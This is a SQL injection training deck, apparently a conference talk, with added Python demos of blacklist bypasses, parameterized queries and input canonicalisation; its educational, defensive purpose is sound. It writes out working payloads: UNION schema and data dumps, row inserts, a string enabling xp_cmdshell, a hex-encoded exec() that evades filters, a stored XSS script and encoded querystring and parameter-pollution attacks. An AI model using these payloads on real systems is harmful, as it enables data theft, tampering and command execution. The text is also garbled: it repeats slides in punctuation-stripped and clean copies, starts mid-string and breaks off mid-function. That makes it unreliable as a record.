F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger, Will Robinson
Need a reason to update your resume? Try putting this code on a production machine.
Goofus would:
• Hack naked
• Exploit external sites
• Point out that "résumé" is spelled with e-acutes
Demo Time: Put On Your Safety Goggles
• Starting in SQL Server Management Studio
  – Treat this as your lab
• Open up SQL Profiler
  – Watch the actual queries as they pass through
• Get rolling with Demo 1
What Went Wrong?
• SQL injection works by getting 'outside' the parameter
• We weren't able to
• Lesson 1: you can't inject into static SQL directly; with a parameterized query the input stays inside the parameter, so there is nothing to get outside of
• Dynamic SQL
  – Ad hoc query
  – T-SQL dynamic SQL
Demo 2: Win, Or You're Out Of The Family
• Try this again using dynamic SQL
• Survey says: Success!
• Lesson 2: Using unsecured dynamic SQL, we can successfully attack
• Now we're ready to look at practical applications
Anatomy Of A SQL Injection Attack
• Basic SQL query looks like: "select [cols] from [table] where [filter] like '" + Filter + "'"
• SQL comment line: --
• Example of a potential attack: Filter = "boo' OR 1 = 1 --"
• Turns into: "select [cols] from [table] where [filter] like 'boo' OR 1 = 1 --'"
  – The injected quote closes the string literal, OR 1 = 1 makes the predicate true for every row, and the -- comments out the trailing quote the application appended
The Naïve Developer
• Basic task: load a grid based upon filtering criteria entered into a text box
• Our naïve developer hits the Googles and finds out how to use a SqlDataReader
• The code works, searches are successful
  – Even checks the filter to make sure a value exists
Having Fun With The Naïve Developer
• f' OR 1 = 1--
  – Bypass the filter, list all records
• Not fun enough? Gimme more!
• SHOOOO' UNION select TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Pick a name which doesn't exist; now we have a list of tables
  – The UNION has to supply the same number of columns as the application's query (three here), which is what the 1, 1 padding is for
• SHOOOO' UNION select COLUMN_NAME + ' ' + DATA_TYPE, case when IS_NULLABLE = 'NO' then 0 else 1 end, ORDINAL_POSITION from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'ProductSubcategory' and TABLE_SCHEMA = 'Production'--
  – Recon on a particular table
• SHOOOO' UNION select Name, ProductSubcategoryID, ProductCategoryID from Production.ProductSubcategory--
  – Looking at the actual data in that table

Having Fun With The Naïve Developer
• SHOOOO' insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, 'Evil Hacker Subcategory', newid(), current_timestamp)--
  – Boom! Exploit complete
• nada' exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; --
  – Turn on xp_cmdshell, letting us run external apps
  – sp_configure needs the ALTER SETTINGS server permission (sysadmin or serveradmin), so this step only works when the application connects with an over-privileged login
Our Developer's Response
• Users mention this "evil hacker subcategory". Developer investigates
• More internet searching; dev learns about blacklisting and creates a filter for his filter
  – No more of this "select" and "insert" rubbish

In Retrospect…
• Problem: the little old ladies using our program just got scared because they looked for the "Selected" subcategory, and the blacklist matched the "select" inside it
Back To The Drawing Board
• Need a slightly less naïve approach to filtering
• Our developer has a stroke of genius: evil hackers need to use "select" + space, whereas our little old ladies would use "select" without a space. We now have a separating equilibrium
• Problem: you're doing it wrong
• Proof: SHOOOO' UNION select<tab>TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Yeah, that's a tab (hex 09) where the space used to be. Other valid separators: 0A, 0B, 0C, 0D, A0
150 Copy-Pastes Later…
• After adding various permutations of SQL commands + separators…
• declare @shmoo varchar(8000);
  set @shmoo = CAST(0x73656C656374095441424C455F534348454D41202B20272E27202B205441424C455F4E414D45206173204E616D652C20312061732049734163746976652C203120617320536F72744F726465722066726F6D20494E464F524D4154494F4E5F534348454D412E5441424C4553 as varchar(8000));
  exec(@shmoo);
  – None of the blacklisted keywords appear anywhere in this text; the filter has nothing to match until the server decodes it
Translating The Varbinary
• select cast('select' + char(9) + 'TABLE_SCHEMA + ''.'' + TABLE_NAME as Name, 1 as IsActive, 1 as SortOrder from INFORMATION_SCHEMA.TABLES' as varbinary(8000))
  – This is how the 0x literal on the previous slide was produced; char(9) is the tab after "select"
• Important note: this won't combine data together
  – The exec() runs as a separate statement, so its rows don't come back through the application's query the way the UNION payloads did
  – Varbinary runs are better for insert/update/delete operations
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<a href="http://www.google.com">Hacker Domain</a>'', newid(), current_timestamp)' as varbinary(8000))
  – Add in undesired links. Hint from Heloise: this looks suspiciously like the beginning of a cross-site scripting attack

Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<script type="text/javascript">alert("A")</script>'', newid(), current_timestamp)' as varbinary(8000))
  – Script stored in a column the grid renders: the SQL injection has turned into a persistent XSS
Querystring Injection
• Helpful table to understand querystring injection (URL-encoded byte and the character it stands for):
  Hex Code  Character
  09        Tab
  20        Space
  25        %
  27        '
  2B        +
  2C        ,
  2D        -
  2E        .
  3D        =
Querystring Injection
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%25%27%20or%201%3D1%2D%2D
  – Translates to "bike%' or 1=1--"
• The way we did the Slightly Less Naïve Stop actually helps us here by preventing some querystring attacks: http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%25%27%20union%20select%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – That "select%20" is equivalent to "select ", which the blacklist catches

Querystring Injection
• Injecting other whitespace characters is as easy as %09… or %0A…
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%25%27%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
HTTP Parameter Pollution
• In ASP.NET, including a parameter multiple times causes the different entries to be concatenated and separated by commas
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=36&search=jump&search=street
  – Turns into "36,jump,street" in our search
• This can be used for evil. Any guesses how?

HTTP Parameter Pollution
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%25%27%20union%20select%2F%2A&search=%2A%2F%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – %2F%2A = /* and %2A%2F = */
  – Translates to "select/*,*/ table_schema…": the comma ASP.NET inserts lands inside a comment, and "select" is now followed by "/" rather than a space, so the blacklist never fires

HTTP Parameter Pollution
• HTTP Parameter Pollution is something most people don't even think about
  – It doesn't help that different platforms react in different ways: concatenate, ignore all but the last, etc.
Effects On Different Platforms
• See the platform table in Carettoni and Di Paola's AppSec EU 2009 paper: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
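Why the "select" + space blacklist from Back To The Drawing Board loses to the separator trick, the hex-encoded payload from 150 Copy-Pastes Later, and the querystring and parameter-pollution payloads on the slides above, as an added example that is not part of the original deck. It is plain Python: the filter function is a reconstruction of the deck's rule, the hex string is the 0x literal from the slide, the querystrings are the slide URLs, and aspnet_querystring_value only imitates the comma-joining the deck attributes to ASP.NET (it is not ASP.NET code). The list of separators SQL Server accepts is taken from the slide and is not checked against a server here.

```python
from urllib.parse import parse_qs


def slightly_less_naive_filter(user_input):
    """The deck's blacklist: reject a keyword only when it is followed by a space,
    so that a search for 'Selected' is still allowed. Returns True if allowed."""
    lowered = user_input.lower()
    return not any(keyword in lowered for keyword in ("select ", "insert "))


# Separators the slide says SQL Server's parser accepts in place of a space.
SEPARATORS = {
    "space": " ", "tab": "\x09", "lf": "\x0a", "vt": "\x0b",
    "ff": "\x0c", "cr": "\x0d", "nbsp": "\xa0",
}


def separator_bypasses():
    """The UNION payload with each separator after 'select'. True = got past the filter."""
    template = ("SHOOOO' UNION select{sep}TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 "
                "from INFORMATION_SCHEMA.TABLES--")
    return {name: slightly_less_naive_filter(template.format(sep=sep))
            for name, sep in SEPARATORS.items()}


# The 0x literal from the '150 Copy-Pastes Later' slide, without the 0x prefix.
SHMOO_HEX = (
    "73656C656374095441424C455F534348454D41202B20272E27202B205441424C455F4E414D45"
    "206173204E616D652C20312061732049734163746976652C203120617320536F72744F72646572"
    "2066726F6D20494E464F524D4154494F4E5F534348454D412E5441424C4553"
)


def decode_varbinary_payload(hex_text):
    """What CAST(0x... as varchar(8000)) hands to exec(): the bytes read as text."""
    return bytes.fromhex(hex_text).decode("ascii")


def encode_varbinary_payload(sql_text):
    """The 'Translating The Varbinary' direction: text -> 0x literal."""
    return "0x" + sql_text.encode("ascii").hex().upper()


def aspnet_querystring_value(raw_query, name):
    """Imitates Request.QueryString[name] as the deck describes it: every occurrence
    of the parameter is URL-decoded, then the values are joined with commas."""
    return ",".join(parse_qs(raw_query, keep_blank_values=True).get(name, []))


# Querystrings from the slides (the path before '?' plays no part in the decoding).
SLIDE_QUERYSTRINGS = {
    "or_1_eq_1": "search=bike%25%27%20or%201%3D1%2D%2D",
    "union_space": ("search=bike%25%27%20union%20select%20table_schema%2B%27%2E%27%2B"
                    "TABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D"),
    "union_tab": ("search=prevention%25%27%20union%20select%09table_schema%2B%27%2E%27%2B"
                  "TABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D"),
    "hpp_plain": "search=36&search=jump&search=street",
    "hpp_comment": ("search=prevention%25%27%20union%20select%2F%2A&search=%2A%2F%20"
                    "table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20"
                    "information_schema.tables%2D%2D"),
}


def querystring_results():
    """(decoded search value, did it get past the filter) for each slide querystring."""
    out = {}
    for label, qs in SLIDE_QUERYSTRINGS.items():
        value = aspnet_querystring_value(qs, "search")
        out[label] = (value, slightly_less_naive_filter(value))
    return out


if __name__ == "__main__":
    print(separator_bypasses())
    decoded = decode_varbinary_payload(SHMOO_HEX)
    print(repr(decoded), slightly_less_naive_filter(decoded))
    for label, (value, allowed) in querystring_results().items():
        print(f"{label}: allowed={allowed} value={value!r}")
```

Only the space variant and the plain "select%20" querystring are stopped; every separator, the hex literal (which contains no keyword at all) and the /*,*/ split across two search= values walk straight through, which is the recap's point that a blacklist has to anticipate every encoding the parser accepts while a whitelist only has to describe the data you expect.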
Doing It Right: Parameterized Queries
• The right way to do it
  – All parameters created using SqlParameter
  – Not necessary to use stored procedures, though in SQL Server this is preferable
• Stored Procedure-Driven Test: not susceptible to SQL injection. You are safe from this issue
• Secure Query-Driven Test: not susceptible either
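The naive concatenation from the Anatomy and Having Fun With The Naïve Developer slides next to the parameterized version this slide calls for, as an added example that is not part of the original deck. It uses Python's sqlite3 module as an offline stand-in for SQL Server and ASP.NET: the ? placeholder plays the role of SqlParameter, sqlite_master plays the role of INFORMATION_SCHEMA.TABLES, the table and rows are constructed sample data, and the function names are the example's own.

```python
import sqlite3

# Constructed sample rows standing in for Production.ProductSubcategory.
SAMPLE_ROWS = [
    (1, 1, "Mountain Bikes"),
    (2, 1, "Road Bikes"),
    (3, 1, "Touring Bikes"),
    (4, 2, "Handlebars"),
]


def make_db():
    """In-memory sqlite3 database; stands in for the SQL Server lab database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table ProductSubcategory("
        "ProductSubcategoryID integer, ProductCategoryID integer, Name text)"
    )
    conn.executemany("insert into ProductSubcategory values (?, ?, ?)", SAMPLE_ROWS)
    return conn


def naive_search(conn, filter_text):
    """The naive developer's query: the text box value is glued into the SQL string,
    so a quote in the input closes the literal and the rest of the input becomes SQL."""
    sql = (
        "select ProductSubcategoryID, ProductCategoryID, Name "
        "from ProductSubcategory where Name like '" + filter_text + "'"
    )
    return conn.execute(sql).fetchall()


def parameterized_search(conn, filter_text):
    """Same search with the value bound as a parameter (the DB-API equivalent of
    SqlParameter / sp_executesql). The driver sends the value separately from the
    statement text, so the input can never get 'outside' the parameter."""
    sql = (
        "select ProductSubcategoryID, ProductCategoryID, Name "
        "from ProductSubcategory where Name like ?"
    )
    return conn.execute(sql, (filter_text,)).fetchall()


# Payloads from the deck. The UNION must supply the same number of columns as the
# application's query (three here); sqlite_master is this database's catalog table.
BYPASS_FILTER = "f' OR 1 = 1--"
SCHEMA_DUMP = "SHOOOO' UNION select name, type, sql from sqlite_master--"


def run_demo():
    """What each version of the query gives back for each payload."""
    conn = make_db()
    return {
        "naive_bypass": naive_search(conn, BYPASS_FILTER),          # every row
        "naive_schema": naive_search(conn, SCHEMA_DUMP),            # catalog rows
        "param_bypass": parameterized_search(conn, BYPASS_FILTER),  # no rows
        "param_schema": parameterized_search(conn, SCHEMA_DUMP),    # no rows
        # Parameters stop injection, not LIKE wildcards: '%' is still a wildcard,
        # which is the 'understand your data domain' point in the recap.
        "param_wildcard": parameterized_search(conn, "%Bikes"),     # three rows
    }


if __name__ == "__main__":
    for label, rows in run_demo().items():
        print(f"{label}: {rows}")
```

With the parameter bound, both payloads are searched for literally as subcategory names and match nothing; the wildcard row is there to show what parameterization does not do, which is why input validation is still on the recap list.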
Adding Dynamic SQL Into The Mix
• Basic insecure dynamic SP:
  create procedure BadProc
    @Filter nvarchar(500)
  as
  declare @sql varchar(250)
  set @sql = 'select * from [table] where Name like ''' + @Filter + ''''
  exec(@sql)
• The basic problem is the same as in the query-driven injection example: @Filter is not sanitized or parameterized, it is concatenated straight into the statement text
Attacking Insecure Dynamic SPs
• Easy to perform attacks on unprotected dynamic stored procedures from SSMS
• exec BadProc @Filter = 'SHOOOO'' UNION select TABLE_SCHEMA + ''.'' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--'
• Using SqlParameter in ASP.NET does not save you here: the payload arrives intact in @Filter, and the procedure itself then concatenates it into dynamic SQL. The procedure has to be fixed
Protecting Your Dynamic SPs
• Use sp_executesql
  – Could also use a combo of QUOTENAME and REPLACE for the pieces that cannot be parameters (table and column names)
• Include the parameter as a parameter inside the SQL to run
• Example (inside a procedure that receives @Filter):
  declare @sql nvarchar(max);
  set @sql = N'select ProductSubcategoryID, ProductCategoryID, Name from Production.ProductSubcategory where Name like @Filter';
  exec sp_executesql @sql, N'@Filter varchar(200)', @Filter;
• Once you do this, the value of @Filter can no longer break out of the query. Anything you still concatenate into @sql (table names, column names, ORDER BY clauses) remains injectable and needs QUOTENAME
Recap: What To Do
• Parameterize your queries
  – Use SqlParameter to handle input in ASP.NET
  – Use sp_executesql correctly when you do use dynamic SQL
• Understand your data domain
  – Correct data sizes (not too large)
  – Input field has correct length
  – Regular expressions for well-defined field types (e.g. phone number, Social Security Number)
• Blacklists usually don't work, but whitelists can
• Create limited-access accounts for web applications
  – A login with only the table permissions the application needs cannot run sp_configure, so the xp_cmdshell step fails even when the injection itself succeeds
• Constraints in UI, business objects and database
  – Defense in depth
  – This isn't really a violation of DRY
  – If I can beat two of your three checks, the third could still stop me
Next Steps
• Automation
  – Havij (most popular, easy GUI)
  – sqlmap (my favorite)
  – BSQL Hacker (blind SQL injection)
  – BBQSQL (Python-based blind SQL injection)
  – Fast-Track (Metasploit module)
  – Plenty more where this came from
• Really evil stuff

Q&A
Kevin Feasel, feaselkl@gmail.com
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
What Went Wrong?
• SQL injection works by getting 'outside' the parameter
• We weren't able to
• Lesson 1: can't inject static SQL directly
• Dynamic SQL
  – Ad hoc query
  – T-SQL dynamic SQL
Demo 2: Win Or You're Out Of The Family
• Try this again using dynamic SQL
• Survey says: Success!
• Lesson 2: Using unsecured dynamic SQL, we can successfully attack
• Now we're ready to look at practical applications
Anatomy of a SQL injection attack
• Basic SQL query looks like "select [cols] from [table] where [filter] like '" + Filter + "'"
• SQL comment line: --
• Example of a potential attack: Filter = "boo' OR 1 = 1 --"
• Turns into "select [cols] from [table] where [filter] like 'boo' OR 1 = 1 --'"
The Naïve Developer
• Basic task: load a grid based upon filtering criteria entered into a text box
• Our naïve developer hits the Googles and finds out how to use a SqlDataReader
• The code works; searches are successful
  – Even checks the filter to make sure a value exists
Having Fun With The Naïve Developer
• f' OR 1 = 1--
  – Bypass the filter; list all records
• Not fun enough? Gimme more!
• SHOOOO' UNION select TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Pick a name which doesn't exist; now we have a list of tables
• SHOOOO' UNION select COLUMN_NAME + ' ' + DATA_TYPE, case when IS_NULLABLE = 'NO' then 0 else 1 end, ORDINAL_POSITION from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'ProductSubcategory' and TABLE_SCHEMA = 'Production'--
  – Recon on a particular table
• SHOOOO' UNION select Name, ProductSubcategoryID, ProductCategoryID from Production.ProductSubcategory--
  – Looking at the actual data in that table
Having Fun With The Naïve Developer
• SHOOOO' insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, 'Evil Hacker Subcategory', newid(), current_timestamp)--
  – Boom. Exploit complete.
• nada' exec sp_configure 'show advanced options', 1 reconfigure exec sp_configure 'xp_cmdshell', 1 reconfigure --
  – Turn on xp_cmdshell, letting us run external apps
Our Developer's Response
• Users mention this "evil hacker subcategory"; developer investigates
• More internet searching: dev learns about blacklisting and creates a filter for his filter
  – No more of this "select" and "insert" rubbish
In Retrospect…
• Problem: the little old ladies using our program just got scared because they looked for the "Selected" subcategory
Back To The Drawing Board
• Need a slightly less naïve approach to filtering
• Our developer has a stroke of genius: evil hackers need to use "select" + space, whereas our little old ladies would use "select" without a space. We now have a separating equilibrium!
• Problem: you're doing it wrong
• Proof: SHOOOO' UNION select<tab>TABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--
  – Yeah, that <tab> is a tab character (hex 09). Other valid separators: 0A, 0B, 0C, 0D, A0
150 Copy-Pastes Later…
• After adding various permutations of SQL commands + separators…
• declare @shmoo varchar(8000) set @shmoo = CAST(0x73656C656374095441424C455F534348454D41202B20272E27202B205441424C455F4E414D45206173204E616D652C20312061732049734163746976652C203120617320536F72744F726465722066726F6D20494E464F524D4154494F4E5F534348454D412E5441424C4553 as varchar(8000)) exec(@shmoo)
Translating The Varbinary
• select cast('select TABLE_SCHEMA + ''.'' + TABLE_NAME as Name, 1 as IsActive, 1 as SortOrder from INFORMATION_SCHEMA.TABLES' as varbinary(8000))
• Important note: this won't combine data together with the page's own result set
  – Varbinary runs are better for insert/update/delete operations
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<a href="http://www.google.com">Hacker Domain</a>'', newid(), current_timestamp)' as varbinary(8000))
  – Add in undesired links. Hint from Heloise: this looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
• select CAST('insert into Production.ProductSubcategory(ProductCategoryID, Name, rowguid, ModifiedDate) values(1, ''<script type="text/javascript">alert("A")</script>'', newid(), current_timestamp)' as varbinary(8000))
Querystring Injection
• Helpful table to understand querystring injection
  Hex Code   Character
  09         Tab
  20         Space
  25         %
  27         '
  2B         +
  2C         ,
  2D         -
  2E         .
  3D         =
Querystring Injection
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20or%201%3D1%2D%2D
  – Translates to "bike' or 1=1--"
• The way we did the Slightly Less Naïve Stop actually helps us here by preventing some querystring attacks: http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=bike%2527%20union%20select%20table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
  – That "select%20" is equivalent to "select " (select followed by a space), which the filter catches
Querystring Injection
• Injecting other whitespace characters is as easy as %09… or %0A…
• http://localhost/SQLInjectionWorkbench/QueryDriven.aspx?search=prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME%20as%20Name%2C1%2C1%20from%20information_schema.tables%2D%2D
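The separator trick, the percent-encoded querystrings and the hex-literal payload from the preceding slides all slip past the same keyword blacklist for one reason: the filter inspects the raw bytes it received, not what SQL Server will eventually parse. The Python script below is an added example (it is not code from the talk or from the SQLInjectionWorkbench demo) showing the canonicalisation a defender's input check or WAF rule has to do first: percent-decode repeatedly (a doubly encoded quote arrives as %2527), expand 0x… hex literals back into text, and fold the separators the slide lists (09, 0A, 0B, 0C, 0D, A0) into one space. It then applies the deck's own "select followed by a space" rule to each input before and after canonicalisation. The sample inputs are constructed to mirror the slides' payloads, and all function names are my own.

```python
"""Canonicalise a search string before inspecting it, to show why the
deck's keyword blacklist ('select' + space) misses encoded variants.

Added example, not code from the talk. Undoes the three evasions the
slides demonstrate: alternative separators, (double) percent-encoding,
and payloads hidden in a 0x... hex literal that is CAST back to text.
"""
import re
from urllib.parse import unquote

# Separator bytes SQL Server accepts between tokens (slide: 09 0A 0B 0C 0D A0),
# plus the ordinary space; any run of them collapses to a single space.
SEPARATOR_RUN = re.compile(r"[ \t\n\x0b\x0c\r\xa0]+")
# A T-SQL binary literal: 0x followed by an even number of hex digits.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")


def percent_decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding (%2527 -> %27 -> ')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def expand_hex_literals(value: str) -> str:
    """Replace 0x... literals with their text when they decode as ASCII."""
    def _decode(match):
        raw = match.group(1)
        if len(raw) % 2:
            return match.group(0)          # odd length: not a byte string
        try:
            return bytes.fromhex(raw).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return match.group(0)          # binary data, leave untouched
    return HEX_LITERAL.sub(_decode, value)


def canonicalise(value: str) -> str:
    """Decode, expand hex, fold separator runs, lower-case."""
    value = expand_hex_literals(percent_decode_fully(value))
    return SEPARATOR_RUN.sub(" ", value).lower()


def naive_filter_hits(value: str) -> bool:
    """The deck's 'slightly less naive' rule: reject 'select' followed by a space."""
    return "select " in value.lower()


# Constructed inputs modelled on the slides' payloads (not real traffic).
SAMPLES = {
    "tab separator": "SHOOOO' UNION select\tTABLE_SCHEMA + '.' + TABLE_NAME, 1, 1 from INFORMATION_SCHEMA.TABLES--",
    "double-encoded querystring": "prevention%2527%20union%20select%09table_schema%2B%27%2E%27%2BTABLE_NAME",
    "hex literal": "declare @s varchar(8000) set @s = CAST(0x73656C656374095441424C455F534348454D41 as varchar(8000)) exec(@s)",
    "legitimate search": "Selected",
}


def compare(samples=SAMPLES) -> dict:
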